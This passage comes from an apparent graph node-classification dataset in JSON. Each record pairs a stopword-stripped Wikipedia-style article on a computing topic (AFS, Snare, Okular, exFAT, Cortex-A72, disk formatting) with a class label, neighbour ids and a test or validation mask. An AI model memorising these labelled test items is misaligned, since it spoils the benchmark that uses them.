unavailable clients look remaining copies users data unaware location read-only copy administrators create relocate copies needed afs command suite guarantees read-only volumes contain exact copies original read-write volume time read-only copy created file name space andrew workstation partitioned shared local name space shared name space usually mounted /afs unix filesystem identical workstations local name space unique workstation contains temporary files needed workstation initialization symbolic links files shared name space andrew file system heavily influenced version 4 sun microsystems popular network file system nfs additionally variant afs distributed file system dfs adopted open software foundation 1989 part distributed computing environment finally afs version two predecessor coda file system three major implementations transarc ibm openafs arla transarc software deprecated losing support fourth implementation exists linux kernel source code since least version 2.6.10 committed red hat fairly simple implementation still early stages development therefore incomplete january 2013 following access control list acl permissions granted permissions affect files subdirectories include additionally afs includes application acls h effect access files",
    "neighbors": [
      5120,
      2564,
      6669,
      3598,
      10257,
      9236,
      6677,
      5142,
      8214,
      3611,
      9249,
      9762,
      5158,
      4140,
      7225,
      11323,
      8772,
      7244,
      1109,
      5206,
      10851,
      4708,
      9836,
      7789,
      9333,
      6263,
      9335,
      9343,
      7818,
      654,
      2193,
      2194,
      2197,
      2199,
      11419,
      6309,
      1190,
      5286,
      10405,
      5293,
      7344,
      2230,
      5816,
      1212,
      8380,
      3265,
      10951,
      9420,
      7378,
      3795,
      4819,
      8402,
      8404,
      728,
      8410,
      6365,
      5855,
      739,
      7907,
      11492,
      8938,
      1263,
      3312,
      9455,
      2291,
      246,
      3834,
      3328,
      5889,
      11012,
      2314,
      8461,
      6416,
      1810,
      2322,
      6935,
      11033,
      287,
      1825,
      6434,
      5413,
      3368,
      4907,
      9004,
      302,
      11568,
      6961,
      6963,
      1844,
      3898,
      6970,
      11072,
      3909,
      2378,
      4431,
      5969,
      346,
      2395,
      2397,
      10596,
      2407,
      10087,
      3439,
      11638,
      6519,
      376,
      11128,
      890,
      7554,
      8075,
      7565,
      6545,
      5013,
      11675,
      11676,
      414,
      2974,
      7070,
      10151,
      4012,
      1454,
      6062,
      8114,
      7603,
      8631,
      1464,
      1978,
      9665,
      8643,
      3018,
      5580,
      7126,
      2015,
      1509,
      9189,
      7663,
      11256,
      2555,
      3582
    ],
    "mask": "Test"
  },
  {
    "node_id": 3827,
    "label": 4,
    "text": "Snare_(software):snare software snare sometimes also written snare acronym system intrusion analysis reporting environment collection software tools collect audit log data variety operating systems applications facilitate centralised log analysis enterprise agents available linux osx windows solaris microsoft sql server variety browsers snare enterprise epilog windows facilitates central collection processing windows text-based log files isa/iis snare enterprise epilog unix provides method collect text based log files linux solaris operating systems opensource agents available irix aix snare currently used hundreds thousands individuals organisations worldwide meet local federal information security guidelines associated auditing eventlog collection snare series agents began life 2001 team intersect alliance created linux kernel module implement trusted computer system evaluation criteria auditing c2 level agents windows solaris soon followed additional operating systems applications added mix time snare server software originally designed meet needs australian-based intelligence agency clients distribution restricted australia need server solution complement increasingly popular snare agents pushed intersect alliance team find overseas partners allow distribution internationally snare described 'de facto standard windows event retrieval deep roots open source movement coupled available commercial support options used small non-profit organisations right huge multinational fortune-500 companies organisations produce audit server software competes snare server software cisco sensage loglogic use recommend snare agents customers agents supported commercial open-source version available snare agents designed collect audit log data host system push data quickly possible central server servers archive analysis reporting central server either syslog server snare server appliance custom application snare agents also able push logs unidirectional network order facilitate log transfer networks low classification networks higher classification snare server appliance software-only solution provides variety analysis tools facilitate collection analysis reporting archival audit log data",
    "neighbors": [
      4033,
      4067,
      4234,
      6797,
      3482,
      11030,
      823,
      2426,
      4439
    ],
    "mask": "Validation"
  },
  {
    "node_id": 3828,
    "label": 9,
    "text": "Okular:okular okular multiplatform document viewer developed kde community based qt kde frameworks libraries distributed part kde applications bundle originally based kpdf replaced kpdf kghostview kfax kfaxview kdvi kde 4 functionality easily embedded applications okular started google summer code 2005 piotr szymański accepted student okular identified success story 2007 season usability season okular toolbar mockup created based analysis popular document viewers usage survey ported qt 5 december 2016 version numbering jumped 0.26 1.0 okular annotation features include commenting pdf documents highlighting drawing lines geometric shapes adding textboxes stamps annotations stored separately unmodified pdf file since version 0.15 poppler 0.20 saved document standard pdf annotations text extracted text file possible select parts document copy text image clipboard features include reading text aloud using qt speech module part qt since qt 5 previously using jovie trimming white page borders setting bookmarks supports following file formats official version obeys drm restrictions pdf files default may prevent copying printing converting pdf files turned options obey drm limitations however",
    "neighbors": [
      6408,
      6539,
      7181,
      1295,
      5397,
      1822,
      543,
      6694,
      8621,
      7983,
      8627,
      8628,
      823,
      1083,
      9408,
      196,
      2886,
      73,
      9418,
      3407,
      6991,
      2513,
      2258,
      10838,
      7384,
      8921,
      8413,
      5869,
      6257,
      6389,
      4855
    ],
    "mask": "Validation"
  },
  {
    "node_id": 3829,
    "label": 3,
    "text": "Klaiber's_law:klaiber law simply stated klaiber law proposes silicon wafer size dictate largest diameter ultrapure water supply piping needed within semiconductor wafer factory ultrapure water upw used extensively fabrication steps making computer microchips microchips fabricated round thin substrates silicon called wafer since 1990s pipes fittings valves used carry upw increased dramatically diameter consequently delivered volume gallons per minute usage polyvinylidene fluoride pvdf material choice larger conduits convey upw pvdf also referenced astm 5127 – 07 standard guide ultra-pure water used electronics semiconductor industries needed maintain highest qualities water early 1990s observation made dr. felix klaiber since referred klaiber ’ law recognized semiconductor jump using 100mm 150mm diameter silicon wafers largest conduits upw systems pvdf 110mm outer diameter soon followed need larger 160mm pvdf conduits next jump 200mm silicon wafers years later required 225mm pvdf conduits recently semiconductor jump 300mm wafers required need even larger upw systems using 315mm conduits since dr. klaiber earlier postulation relationship wafer size diameter pvdf conduits observed others unbeknownst libman et al. identical position klaiber law discussed 2010 presentation current hp high purity pvdf piping size limited 12 inch 305mm historically size wafer coincided diameter main lines libman questioned trend would continue 450mm wafers",
    "neighbors": [],
    "mask": "None"
  },
  {
    "node_id": 3830,
    "label": 9,
    "text": "ExtendScript:extendscript extendscript scripting language associated toolkit developed adobe systems intended use creative suite technical communication suite products dialect ecmascript 3 standard therefore similar javascript actionscript toolkit comes bundled creative suite technical communication suite editions access tools within applications like photoshop framemaker indesign effects batch-processing projects",
    "neighbors": [
      8262,
      3462,
      11625,
      6797,
      7983,
      10097
    ],
    "mask": "Test"
  },
  {
    "node_id": 3831,
    "label": 9,
    "text": "EusLisp_Robot_Programming_Language:euslisp robot programming language euslisp lisp-based programming system built basis object orientation designed specifically developing robotics software first version ran 1986 unix-system5/ustation-e20",
    "neighbors": [
      6502
    ],
    "mask": "Test"
  },
  {
    "node_id": 3832,
    "label": 9,
    "text": "Domain-specific_modeling:domain-specific modeling domain-specific modeling dsm software engineering methodology designing developing systems computer software involves systematic use domain-specific language represent various facets system domain-specific modeling languages tend support higher-level abstractions general-purpose modeling languages require less effort fewer low-level details specify given system domain-specific modeling often also includes idea code generation automating creation executable source code directly domain-specific language models free manual creation maintenance source code means domain-specific language significantly improve developer productivity reliability automatic generation compared manual coding also reduce number defects resulting programs thus improving quality domain-specific language differs earlier code generation attempts case tools 1980s uml tools 1990s code generators modeling languages built tool vendors possible tool vendor create domain-specific language generators normal domain-specific language occur within one organization one expert developers creates modeling language generators rest developers use modeling language generator built organization use allows tight fit exact domain response changes domain domain-specific languages usually cover range abstraction levels particular domain example domain-specific modeling language mobile phones could allow users specify high-level abstractions user interface well lower-level abstractions storing data phone numbers settings likewise domain-specific modeling language financial services could permit users specify high-level abstractions clients well lower-level abstractions implementing stock bond trading algorithms domain-specific modeling also helpful reason low-level software artifacts define language one needs language write definition language model often called metamodel hence language defining modeling language meta-metamodel meta-metamodels divided two groups derived customizations existing languages developed specifically meta-metamodels derived meta-metamodels include entity relationship diagrams formal languages extended backus-naur form ebnf ontology languages xml schema meta-object facility mof strengths languages tend familiarity standardization original language ethos domain-specific modeling favors creation new language specific task unsurprisingly new languages designed meta-metamodels widely used family languages oprr goprr gopprr focus supporting things found modeling languages minimum effort many general-purpose modeling languages already tool support available form case tools domain-specific language languages tend small market size support construction bespoke case tool scratch instead tool support domain-specific language languages built based existing domain-specific language frameworks domain-specific language environments domain-specific language environment may thought metamodeling tool i.e. modeling tool used define modeling tool case tool resulting tool may either work within domain-specific language environment less commonly produced separate stand-alone program common case domain-specific language environment supports additional layer abstraction compared traditional case tool using domain-specific language environment significantly lower cost obtaining tool support domain-specific language since well-designed domain-specific language environment automate creation program parts costly build scratch domain-specific editors browsers components domain expert needs specify domain specific constructs rules domain-specific language environment provides modeling tool tailored target domain existing domain-specific language takes place domain-specific language environments either commercial metaedit+ actifsource open source gems academic gme increasing popularity domain-specific language led domain-specific language frameworks added existing ides e.g eclipse modeling project emp emf gmf microsoft dsl tools software factories unified modeling language uml general-purpose modeling language software-intensive systems designed support mostly object oriented programming consequently contrast domain-specific language languages uml used wide variety purposes across broad range domains primitives offered uml object oriented programming domain-specific languages offer primitives whose semantics familiar practitioners domain example domain automotive engineering software models represent properties anti-lock braking system steering wheel etc uml includes profile mechanism allows constrained customized specific domains platforms uml profiles use stereotypes stereotype attributes known tagged values uml 2.0 constraints restrict extend scope uml particular domain perhaps best known example customizing uml specific domain sysml domain specific language systems engineering",
    "neighbors": [
      16,
      2009,
      2691,
      9926
    ],
    "mask": "Test"
  },
  {
    "node_id": 3833,
    "label": 7,
    "text": "Online_OS:online os online operating system fully multi-lingual free use web desktop written javascript using ajax windows-based desktop environment open-source applications system utilities developed upon rebox web application framework icube network solutions austrian company located vienna oos.cc short online operating system web application platform mimicked look feel classic desktop operating systems microsoft windows mac os x kde consisted various open source applications built upon so-called rebox web application framework applications could executed integrated parallel way oos could considered web desktop webtop provided basic services gui virtual file system access control management possibilities develop deploy applications online online operating system executed within web browser real operating system rather portal various web applications offering high usability flexibility project partly funded grants internetprivatstiftung austria ipa 01.08.2008 almost 20.000 users joined oos.cc community using offered featured applications development web desktop started icube network solutions 2005 followed first beta releases 2006 hence together youos eyeos considered one first publicly available systems kind first full version including core-level multi-language support file system basic set applications released public march 2007 occasion national exhibition itnt austria left beta state half year later october 2007 first release considered stable 1.0.0 published july 2007 project contained applications received several national innovation awards see gained attention mainly due comprehensive approach taken see oos.cc started national project full platform including offered applications currently available three languages german english well spanish receiving increasing coverage around world examples see current version 1.3.01 01.08.2008 project fully written javascript exclusively using dhtml techniques run web browser without additional software installation needed system implements modern kind web application model excessively using ajax communicating client components java server backend exclusively asynchronous manner aim offer users unique interaction behavior following desktop metaphor main idea web desktop also typical sort web application broadly use javascript-on-demand techniques cutting complete project source pieces loading instantly needed based technical basis rebox framework library applications oos.cc built fully flexible extensible api including gui widget set communication mechanisms server services offering general framework specific services online operating system consisted basic framework able launch javascript application using rebox library user interface based behavior windows desktop start menu task bar desktop background applications running environment server side java based web services ran serve client processes provide data relational database backend oos.cc also provided integrated development environment called developer suite allowed community build applications desktop environment based rebox see development section applications available oos.cc open source european union public licence eupl rebox development toolkit free use developing applications webtop mentioned applications published oos.cc open source based eupl installed deinstalled what-ever preferences user besides global services like multi-language support global theme support well minor tools games oos.cc offered four major services could used completely free charge next releases planned focus extensive security privacy suite dealing challenges like anonymous communication browsing well temporary mail-addresses well offering encrypted password file storage connectivity services since initial stable release oos.cc could accessed using https ensure secure communication one key focuses team right beginning offer flexible comprehensive api used develop custom applications within oos.cc also stand-alone web-applications integrate single components existing web-sites decoupling development web-related problems using rebox api web-applications development similar fashion java program elements positioned interact like high-level object oriented programming languages without taking care divs browser specific behavior communication handling framework also offers multi-language theme support existing well newly created applications allowing changing almost every aspect look feel used components according preferences users taking advantage approach one applications offered oos integrated development suite allowing directly writing executing code hence creating new programs within boundaries web computer applications oos.cc released open source thus existing programs offered imported reviewed changed locally deployed following idea every user free submit changed newly created applications included globally offered application set last release offered features like auto-completion outline-window",
    "neighbors": [
      9762,
      7364,
      3462,
      9286,
      8616,
      1802,
      9772,
      6797,
      5677,
      2737,
      9495
    ],
    "mask": "None"
  },
  {
    "node_id": 3834,
    "label": 6,
    "text": "ExFAT:exfat exfat extended file allocation table file system introduced microsoft 2006 optimized flash memory usb flash drives sd cards exfat proprietary microsoft owns patents several elements design exfat used ntfs feasible solution due data-structure overhead greater file-size limit standard fat32 file system i.e 4 gib required exfat adopted sd card association default file system sdxc cards larger 32 gib 2013 samsung published gpl linux driver exfat exfat first introduced late 2006 part windows ce 6.0 embedded windows operating system vendors signing licenses exfat either embedded systems device manufacturers produce media preformatted exfat entire file allocation table fat family exfat included used embedded systems lightweight better suited solutions low memory low power requirements easily implemented firmware specifications features requirements exfat file system include exfat format allows individual files larger 4 gb facilitating long continuous recording hd video exceed 4 gb limit less hour current digital cameras using fat32 break video files multiple segments approximately 2 4 gb increase capacity increase data transferred write operation needs made efficient sdxc cards running uhs-i minimum guaranteed write speed 10 mbps exfat plays factor achieving throughput reduction file system overhead cluster allocation achieved introduction cluster bitmap elimination reduction writes fat single bit directory record indicates file contiguous telling exfat driver ignore fat optimization analogous extent file systems except applies whole files opposed contiguous parts files exfat supported windows xp windows server 2003 update kb955704 windows embedded ce 6.0 windows vista service pack 1 windows server 2008 windows 7 windows 8 windows server 2008 r2 except windows server 2008 server core windows 10 mac os x starting 10.6.5 companies integrate exfat specific group consumer devices including cameras camcorders digital photo frames flat fee mobile phones pcs networks different volume pricing model exfat supported number media devices modern flat-panel tvs media centers portable media players vendors flash media including usb pen drives compact flash cf solid-state drives ssd ship high-capacity media pre-formatted exfat file system example sandisk ships 256 gb cf cards exfat microsoft entered licensing agreements blackberry panasonic sanyo sony canon aspen avionics audiovox continental harman lg automotive bmw mac os x snow leopard 10.6.5 later create read write verify repair exfat file systems fuse-based implementation named fuse-exfat exfat-fuse read/write support available freebsd multiple linux distributions older versions mac os x kernel implementation also released written samsung initially released github unintentionally later released officially samsung compliance gpl none solutions become official part linux due patent encumbered status exfat file system implementation called exfatfilesystem based fuse-exfat available amigaos 4.1 proprietary read/write solutions licensed derived microsoft exfat implementation available android linux operating systems paragon software group tuxera xcfiles datalight proprietary full-featured implementation intended portable 32-bit systems rtfs ebs embedded software full-featured implementation embedded devices two experimental unofficial solutions available dos loadable usbexfat driver requires panasonic usb stack dos works usb storage devices open-source exfat executable exfat file system reader requires hx dos extender work native exfat real-mode dos drivers would allow usage booting exfat volumes exfat employs filename hash-based lookup phase speed certain cases described us patent 8321439 quick file name lookup using name hash document perhaps contains additional details helpful understanding file system appendix like ntfs exfat pre-allocate disk space file marking arbitrary space disk 'allocated file exfat uses two separate 64-bit length fields directory valid data length vdl indicates real size file physical data length provide improvement allocation cluster storage new file microsoft incorporated method pre-allocate contiguous clusters bypass use updating fat table december 10 2013 us patent office granted patent us8606830 one feature exfat used exfat implementation within embedded systems provides atomic transactions multiple steps updating file system metadata feature called transaction safe fat texfat granted patent us patent office us7613738 november 3 2009. exfat rest fat family file systems use indexes file names unlike ntfs uses b-trees file searching file accessed directory must sequentially searched match found file names shorter 16 characters length one file name record required entire file represented three 32-byte directory records called directory file set 256 mib sub-directory hold 2,796,202 file sets files longer names number decrease maximum based minimum three-record file set help improve sequential searching directories including root hash value file name derived file stored directory record searching file file name first converted upper case using upcase table file names case insensitive hashed using proprietary patented algorithm 16-bit 2 byte hash value record directory searched comparing hash value match found file names compared ensure proper file located case hash collisions improves performance 2 bytes compared file significantly reduces cpu cycles file names 2 characters bytes size virtually every comparison performed 2 bytes time intended file located exfat introduces metadata integrity use checksums three checksums currently use volume boot record vbr 12 sector region contains boot records bios parameter block bpb oem parameters checksum sector two vbr type regions main vbr backup vbr checksum sector checksum previous 11 sectors exception three bytes boot sector flags percent used provides integrity vbr determining vbr modified common cause could boot sector virus would also catch corruption vbr second checksum used upcase table static table never change corruption table could prevent files located table used convert filenames upper case searching locate file third checksum directory file sets multiple directory records used define single file called file set file set metadata including file name time stamps attributes address first cluster location data file lengths file name checksum taken entire file set mismatch would occur directory file set accidentally maliciously changed file system mounted integrity check conducted hashes verified mounting also includes comparison version exfat file system driver make sure driver compatible file system trying mount make sure none required directory records missing example directory record upcase table allocation bitmap required file system ca n't run missing checks fail file system mounted although certain cases may mount read-only file system provides extensibility template-based metadata definitions using generic layouts generic patterns exfat proprietary file system microsoft released specification lack documentation hampered development free open-source drivers exfat accordingly exfat support effectively limited microsoft products microsoft licensees turn inhibited exfat adoption universal exchange format interoperability requires certain results achieved particular predefined way algorithm exfat potentially requires every implementation perform certain procedures exactly way microsoft implementation procedures used microsoft implementation patented patents owned microsoft license use algorithms purchased microsoft companies including apple google samsung done however open-source ecosystem financial incentive open-source vendors purchase license algorithms regardless whether open-source including samsung leaked kernel driver source initially fraudulently rebadged gpl-licensed microsoft stated license required order implement exfat use product device unlicensed distribution exfat driver would make distributor liable financial damages driver found violated microsoft patents patents may enforceable determined legal process expensive time consuming may also possible achieve intended results without infringing microsoft patents october 2018 microsoft released 60,000 patents open invention network members linux systems exfat patents included however discussion within microsoft whether microsoft allow exfat linux devices",
    "neighbors": [
      5120,
      2564,
      11270,
      5643,
      6669,
      3598,
      4624,
      10257,
      9236,
      6677,
      5142,
      8214,
      537,
      3611,
      540,
      3102,
      9249,
      9762,
      8227,
      8740,
      5158,
      1577,
      10281,
      2101,
      7225,
      11323,
      10812,
      3648,
      10306,
      8772,
      10310,
      1098,
      7754,
      10828,
      4173,
      4174,
      9808,
      4178,
      1109,
      10839,
      603,
      9819,
      3170,
      10851,
      4708,
      9836,
      7789,
      622,
      9839,
      6768,
      4210,
      7796,
      9333,
      6263,
      1656,
      6265,
      7290,
      4731,
      3708,
      9335,
      9343,
      10879,
      8328,
      8841,
      7818,
      6797,
      654,
      2193,
      2194,
      9874,
      10900,
      2197,
      2199,
      4248,
      4763,
      11419,
      7838,
      9377,
      3235,
      4771,
      6309,
      1190,
      1703,
      5286,
      6820,
      10405,
      2221,
      5293,
      7344,
      5300,
      2230,
      7351,
      5816,
      3257,
      1212,
      2749,
      8380,
      10428,
      3265,
      2244,
      8391,
      200,
      10951,
      9420,
      1231,
      7378,
      3795,
      4819,
      8402,
      8404,
      728,
      8410,
      6365,
      2782,
      9442,
      739,
      4836,
      7907,
      4326,
      2279,
      1770,
      8938,
      3308,
      1263,
      3312,
      10993,
      3826,
      2291,
      246,
      1791,
      3328,
      8959,
      11519,
      11012,
      2314,
      8461,
      3856,
      3857,
      1810,
      3859,
      6416,
      3351,
      6935,
      8473,
      8985,
      11033,
      8988,
      11546,
      287,
      1825,
      6434,
      292,
      5413,
      3368,
      3881,
      5928,
      4907,
      9004,
      10024,
      302,
      7983,
      10026,
      6961,
      10029,
      6963,
      1844,
      9525,
      11572,
      823,
      10039,
      6970,
      6972,
      11072,
      3394,
      3909,
      2378,
      11082,
      4431,
      5969,
      3922,
      2391,
      4439,
      5465,
      346,
      2395,
      2397,
      2402,
      10596,
      2407,
      2919,
      10087,
      4458,
      6506,
      9066,
      11638,
      6519,
      376,
      9593,
      890,
      11128,
      2943,
      7554,
      2948,
      1418,
      5003,
      5004,
      7565,
      8075,
      8080,
      6545,
      5013,
      11675,
      11676,
      11677,
      414,
      2974,
      7070,
      929,
      11683,
      10151,
      4012,
      430,
      1454,
      6062,
      10673,
      8114,
      7603,
      11184,
      8631,
      1464,
      6584,
      1978,
      9655,
      960,
      8129,
      8643,
      8132,
      6088,
      969,
      3535,
      8659,
      11221,
      7126,
      1498,
      5594,
      478,
      2015,
      6114,
      6115,
      1509,
      9189,
      4074,
      492,
      6637,
      9709,
      7663,
      6641,
      3573,
      11256,
      2555,
      3582
    ],
    "mask": "Test"
  },
  {
    "node_id": 3835,
    "label": 3,
    "text": "ARM_Cortex-A72:arm cortex-a72 arm cortex-a72 microarchitecture implementing armv8-a 64-bit instruction set designed arm holdings austin design centre cortex-a72 3-wide decode out-of-order superscalar pipeline available sip core licensees design makes suitable integration sip cores e.g gpu display controller dsp image processor etc one die constituting system chip soc cortex-a72 announced 2015 serve successor cortex-a57 designed use 20 less power offer 90 greater performance",
    "neighbors": [
      11282,
      9235,
      11289,
      1057,
      38,
      4139,
      8237,
      9774,
      2097,
      8250,
      8253,
      7745,
      7747,
      2635,
      99,
      8812,
      8815,
      10361,
      638,
      644,
      7300,
      8842,
      146,
      659,
      7833,
      666,
      5786,
      6815,
      4258,
      4773,
      9913,
      8383,
      10945,
      4821,
      2788,
      3301,
      9964,
      6391,
      2814,
      781,
      6926,
      5417,
      2862,
      4400,
      7988,
      11062,
      1849,
      6971,
      10562,
      8003,
      6981,
      5963,
      1871,
      1872,
      9042,
      2388,
      6495,
      1377,
      11629,
      6001,
      373,
      8058,
      392,
      398,
      1428,
      9115,
      4508,
      10658,
      5028,
      7077,
      9638,
      3511,
      9155,
      9163,
      7631,
      6608,
      980,
      9685,
      9174,
      10199,
      2524,
      9182,
      10734,
      1014,
      3575
    ],
    "mask": "Validation"
  },
  {
    "node_id": 3836,
    "label": 8,
    "text": "Google_Search_Console:google search console google search console previously google webmaster tools web service google provided free charge webmasters allows check indexing status optimize visibility websites may 20 2015 google rebranded google webmaster tools google search console january 2018 google introduced new version search console refreshed user interface improvements tools let webmasters list inbound links google webmaster tools generally much larger list inbound links discovered using link example.com search query google google tight lipped discrepancy list google webmaster tools includes nofollow links convey search engine optimization authority linked site hand list links generated link example.com type query deemed google important links controversial way google webmaster tools well google index seems routinely ignore link spam manual penalty removed google webmaster tools still display penalty another 1–3 days google search console rebrand information produced demonstrating google search console creates data points reconcile google analytics ranking data particularly within local search market webmaster services hawaii",
    "neighbors": [
      4096,
      1409,
      4995,
      5892,
      8455,
      7816,
      9610,
      5262,
      8719,
      3600,
      6800,
      5522,
      1427,
      5524,
      7700,
      10645,
      11408,
      10009,
      8858,
      1435,
      9244,
      10393,
      798,
      10525,
      288,
      7841,
      2978,
      4901,
      1959,
      3499,
      7595,
      10284,
      3633,
      1203,
      5431,
      2875,
      10045,
      7359,
      8639,
      196,
      3269,
      3782,
      11590,
      11592,
      5193,
      4683,
      4044,
      10445,
      9039,
      3664,
      3409,
      4048,
      3795,
      11343,
      1240,
      1372,
      8285,
      8413,
      6367,
      9949,
      2658,
      6632,
      5483,
      236,
      5100,
      9712,
      9970,
      8821,
      7926,
      7548
    ],
    "mask": "Test"
  },
  {
    "node_id": 3837,
    "label": 8,
    "text": "Perlbal:perlbal perlbal perl-based reverse proxy load balancer web server perlbal maintained group connected danga interactive program common use large web sites distribute load number servers like perl perlbal distributed gnu general public license artistic license thus free software perlbal also features so-called re-proxy mechanism allows backend webapp send back small response perlbal acts internal redirect causes get response data elsewhere often used expensive application server processes defer much simpler faster http servers serve static files freeing application server computing work commonly used conjunction mogilefs additionally plugins written support various operations may traditionally performed application layer example filter plugin developed dynamically alter palette png gif image passes proxy allowing image tinted used livejournal provide predefined page templates whose colors including baked images customized user relatively simple filtering task load balancer layer avoids overhead passing request back full application servers",
    "neighbors": [
      225,
      5249,
      11492,
      4294,
      8582,
      2281,
      6313,
      8941,
      4398,
      3988,
      7764,
      9014,
      7518
    ],
    "mask": "Test"
  },
  {
    "node_id": 3838,
    "label": 4,
    "text": "Simultaneous_Authentication_of_Equals:simultaneous authentication equals cryptography simultaneous authentication equals sae secure password-based authentication password-authenticated key agreement method sae variant dragonfly key exchange defined based diffie–hellman key exchange using finite cyclic groups primary cyclic group elliptic curve problem using diffie–hellman key exchange authentication mechanism resulting key influenced pre-shared key mac addresses peers solve authentication problem sae originally implemented use peers ieee 802.11s peers discover security enabled take part sae exchange sae completes successfully peer knows party possesses mesh password by-product sae exchange two peers establish cryptographically strong key key used authenticated mesh peering exchange ampe establish secure peering derive session key protect mesh traffic including routing traffic january 2018 wi-fi alliance announced wpa3 replacement wpa2 new standard uses 128-bit encryption wpa3-personal mode 192-bit wpa3-enterprise forward secrecy wpa3 standard also replaces pre-shared key exchange simultaneous authentication equals defined ieee 802.11-2016 resulting secure initial key exchange personal mode wi-fi alliance also claims wpa3 mitigate security issues posed weak passwords simplify process setting devices display interface",
    "neighbors": [
      7049,
      5270,
      5671,
      6187,
      4396,
      3762,
      434,
      11321,
      5439,
      8640,
      3780,
      10332,
      4581,
      5863,
      7411,
      11125,
      6904,
      6779,
      8828
    ],
    "mask": "Test"
  },
  {
    "node_id": 3839,
    "label": 8,
    "text": "JSON-WSP:json-wsp json-wsp javascript object notation web-service protocol web-service protocol uses json service description requests responses inspired json-rpc lack service description specification documentation json-rpc sparked design json-wsp description format purpose json-wsp wsdl soap idl corba describe types methods used given service also describes inter-type relations i.e nested types defines types expected method arguments types user expect receive method return values finally description opens possibility add documentation service method parameter return levels communication clients json-wsp server carried using http post requests responses json objects data content-type application/json json-wsp consists four json object specifications note json-wsp specification 1.0 still final please refer real-world example article get idea specification going structured current state actual specification kept launchpad.net rfc proposal currently created hopefully accepted within couple months service-locator service endpoint url accepts json-wsp post request objects service-name service name case sensitive identifies specific service exposed specific server doc_lines doc-string contained doc_lines list reflects single line documentation relates parent object doc_lines.. request object contains information method invoke arguments invoke method also stores information type version optional mirror value used send information client reflected server returned unchanged response object reflection value feature allows clients send multiple requests method send request identification values intercepted client response handler often necessary javascript one request processed simultaneously server response order unknown client reflection value unchanged server reflection request object mirror value marked optional client controls via request whether fault-code meanings possible fault-codes attachment type new json-wsp used anywhere description primitive type requests responses involve attachments message format must multipart/related attachments transported mimeparts media type application/octet-stream content-transfer-encoding raw binary mimeparts must unique content-id entity headers attachment values json-wsp request/response objects must match regular expression ^cid .+ capture group maps one mimepart content-id following example shows simple json-wsp description attachments could look like request method upload described could look like",
    "neighbors": [
      9441,
      10465,
      803,
      10020,
      7878,
      6127,
      10486
    ],
    "mask": "Test"
  },
  {
    "node_id": 3840,
    "label": 2,
    "text": "Microsoft_Layer_for_Unicode:microsoft layer unicode microsoft layer unicode mslu software library windows software developers simplify creating unicode-aware applications windows 95 windows 98 windows also known unicows unicode windows 95/98/me systems unicows.dll even cows microsoft describes providing layer win32 api windows 95/98/me write single unicode version application run properly platforms previously software developers either provide two separate versions application perform complex string translations api decisions runtime mslu announced march 2001 first available july 2001 edition microsoft platform sdk arguably long peak popularity windows 95/98/me codename godot reference play waiting godot centered around failure man named godot appear endless wait felt long overdue normally windows api provides ansi w wide-character versions functions windows 95/98/me versions implemented attempting call w version fail error code indicates function unimplemented windows nt/2000/xp/2003 w versions implemented however operating system generally internally implements w version natively version usually translation thunk w version adding unicows.lib link command-line kernel32.lib advapi32.lib supported win32 system link library linker resolve referenced symbols one provided unicows.lib instead wide-character function called first time runtime function stub unicows.lib first receives control decides running windows 95/98/me system technique application linked mslu windows 95/98/me systems need unicows.dll runtime operating systems slight performance penalty first function call common problem encountered occurs updaters uninstallers rename delete file oledlg.dll preventing operating system loading unicows.dll results applications openoffice.org reporting application start one required libraries found occurs even unicows.dll installed system",
    "neighbors": [
      5754,
      11149
    ],
    "mask": "Test"
  },
  {
    "node_id": 3841,
    "label": 6,
    "text": "Disk_formatting:disk formatting disk formatting process preparing data storage device hard disk drive solid-state drive floppy disk usb flash drive initial use cases formatting operation may also create one new file systems first part formatting process performs basic medium preparation often referred low-level formatting partitioning common term second part process making data storage device visible operating system third part process usually termed high-level formatting often refers process generating new file system operating systems parts three processes combined repeated different levels term format understood mean operation new disk medium fully prepared store files general rule formatting disk leaves existing data disk medium might recoverable special tools special tools remove user data single overwrite files free space block contiguous number bytes minimum unit storage read written disk disk driver earliest disk drives fixed block sizes e.g ibm 350 disk storage unit late 1950s block size 100 6 bit characters starting 1301 ibm marketed subsystems featured variable block sizes particular track could blocks different sizes disk subsystems ibm system/360 expanded concept form count key data ckd later extended count key data eckd however use variable block size hdds fell use 1990s one last hdds support variable block size ibm 3390 model 9 announced may 1993 modern hard disk drives serial attached scsi sas serial ata sata drives appear interfaces contiguous set fixed-size blocks many years 512 bytes long beginning 2009 accelerating 2011 major hard disk drive manufacturers began releasing hard disk drive platforms using advanced format 4096 byte logical blocks floppy disks generally used fixed block sizes sizes function host os interaction controller particular type media e.g. 5¼-inch dsdd would different block sizes depending upon host os controller optical discs generally use fixed block sizes formatting disk use operating system applications typically involves three different processes low-level format floppy disks early hard disks performed disk drive controller standard 1.44 mb floppy disk low-level formatting normally writes 18 sectors 512 bytes 160 tracks 80 side floppy disk providing 1,474,560 bytes storage disk physical sectors actually larger 512 bytes addition 512 byte data field include sector identifier field crc bytes cases error correction bytes gaps fields additional bytes normally included quoted figure overall storage capacity disk different low-level formats used media example large records used cut inter-record gap size several freeware shareware free software programs e.g gparted fdformat nformat 2m allowed considerably control formatting allowing formatting high-density 3.5 disks capacity 2 mb techniques used include linux supports variety sector sizes dos windows support large-record-size dmf-formatted floppy format hard disk drives prior 1990s typically separate disk controller defined data encoded media media drive and/or controller possibly procured separate vendors users often able perform low-level formatting separate procurement also potential incompatibility separate components subsystem would reliably store data user instigated low-level formatting llf hard disk drives common minicomputer personal computer systems 1990s ibm mainframe system vendors typically supplied hard disk drives media case removable media hdds low-level format typically involved subdividing track disk one blocks would contain user data associated control information different computers used different block sizes ibm notably used variable block sizes popularity ibm pc caused industry adopt standard 512 user data bytes per block middle 1980s depending upon system low-level formatting generally done operating system utility ibm compatible pcs used bios invoked using ms-dos debug program transfer control routine hidden different addresses different bioses starting late 1980s driven volume ibm compatible pcs hdds became routinely available pre-formatted compatible low-level format time industry moved historical dumb bit serial interfaces modern intelligent bit serial interfaces word serial interfaces wherein low level format performed factory today end-user cases never perform low-level formatting ide ata hard drive fact often possible modern hard drives formatting done servowriter disk assembled drive factory generally impossible perform complete llf modern hard drives since mid-1990s outside factory term low-level format still used could called reinitialization hard drive factory configuration even terms may misunderstood present ambiguity term low-level format seems due inconsistent documentation web sites belief many users process high-level file system format must called low-level format since much low level formatting process today performed factory various drive manufacturers describe reinitialization software llf utilities web sites since users generally way determine difference complete llf reinitialization simply observe running software results hard disk must high-level formatted misinformed user mixed signals various drive manufacturers perpetuated error note whatever possible misuse terms may exist search hard drive manufacturers web sites terms many sites make reinitialization utilities available possibly bootable floppy diskette cd image files overwrite every byte check damaged sectors hard disk reinitialization include identifying sparing possible sectors 